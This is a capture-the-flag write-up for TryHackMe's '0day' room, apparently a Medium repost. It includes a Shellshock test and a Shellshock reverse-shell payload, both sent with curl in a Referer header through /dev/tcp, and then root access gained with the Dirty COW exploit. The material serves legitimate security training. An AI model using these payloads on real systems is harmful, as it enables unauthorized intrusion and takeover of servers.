This is the write-up for room named 0day on TryHackMe.

The room can be found here :- https://tryhackme.com/room/0day

Details given:

Exploit Ubuntu, like a Turtle in a Hurricane. Root my secure Website, take a step into the history of hacking.

What is required?:

user.txt and root.txt



As always lets start scanning the target with the IP given:

nmap -sC -sV

We have port 22-SSH and port 80-Web open with the above versions. Let enumerate further port 80 using Nikto.


nikto -h

The above nikto scan reveals that this box is vulnerable to Shellshock. This is a very famous bug in bash and according to Wikipedia(https://en.wikipedia.org/wiki/Shellshock_(software_bug)):

Shellshock, also known as Bashdoor,is a family of security bugs in the Unix Bash shell, the first of which was disclosed on 24 September 2014. Shellshock could enable an attacker to cause Bash to execute arbitrary commands and gain unauthorized access to many Internet-facing services, such as web servers, that use Bash to process requests. Nikto scan also revealed few interesting web directories like /admin,/backup and /secret. Lets keep that in mind and if required we can come back to these directories later for further enumeration.

We can use cURL and try to enumerate further and test if we are actually vulnerable to Shellshock.


curl -H “Referer: () { test;}; echo ‘Content-Type: text/plain’; echo; echo; /usr/bin/id; exit”

This outputs www-data as the user confirming it is exploitable using Shellshock.



Lets exploit Shellshock and gets a reverse shell using the following command:

curl -v -H “Referer: () { test;}; echo ‘Content-Type: text/plain’; echo; echo; /bin/bash -i >& /dev/tcp/ 0>&1”

We get our reverse shell and thus our user flag in ryan’s home directory :- THM{Sh********_*****}

Privilege Escalation


Use Linux Exploit Suggester from https://github.com/mzet-/linux-exploit-suggester/blob/master/linux-exploit-suggester.sh which suggest that the box is vulnerable to dirtyc0w vulnerability.

Again this a very famous vulnerability and read more details about it here:- https://dirtycow.ninja/

This can be used to do privilege escalation and a working exploit is available here which worked for this box: https://gist.github.com/rverton/e9d4ff65d703a9084e85fa9df083c679

Target is a x64 machine and we faced problems in compiling the exploit on the target.

www-data@ubuntu:/tmp cat /proc/version
cat /proc/version
Linux version 3.13.0–32-generic (buildd@kissel) (gcc version 4.8.2 (Ubuntu 4.8.2–19ubuntu1) ) #57-Ubuntu SMP Tue Jul 15 03:51:08 UTC 2014

So compile the exploit locally on kali and transfer it to the target.

└─$ gcc cowroot.c -o cowroot -pthread

Running ./cowroot on target gives us root shell and the root flag in /root :- THM{g00d********************}

Originally published at https://basicpentesting.blogspot.com on October 22, 2020.




Software Developer having keen interest in Security, Privacy and Pen-testing. Certs:- Security+,PenTest+,AZ900

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Best Password Manager for Microsoft Windows


Blockchain Security — Blockchain Roadmap

Understand QR Code Scanner How Does It Work Before You Regret (2022)

Here’s What Happens When You Talk to NFT Scammers on Twitter

A piece of paper that says “Your personal recovery seed. Do not disclose this seed to anybody.” In the background are bitcoins and a white hardware wallet.

HackTheBox: Lame (Writeup)

Meta Pool & Meta Yield Presentation at NEAR Hacker House ATX

Digging Android Applications — Part 1 — Drozer + Burp

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store


Software Developer having keen interest in Security, Privacy and Pen-testing. Certs:- Security+,PenTest+,AZ900

More from Medium

GLOATED: The Breath Mints. Part 1: #45–36

May 6 Game Preview: Sounds vs. Tides

Baron’s Corner

OSCP-Like Boxes — Blue Write-Up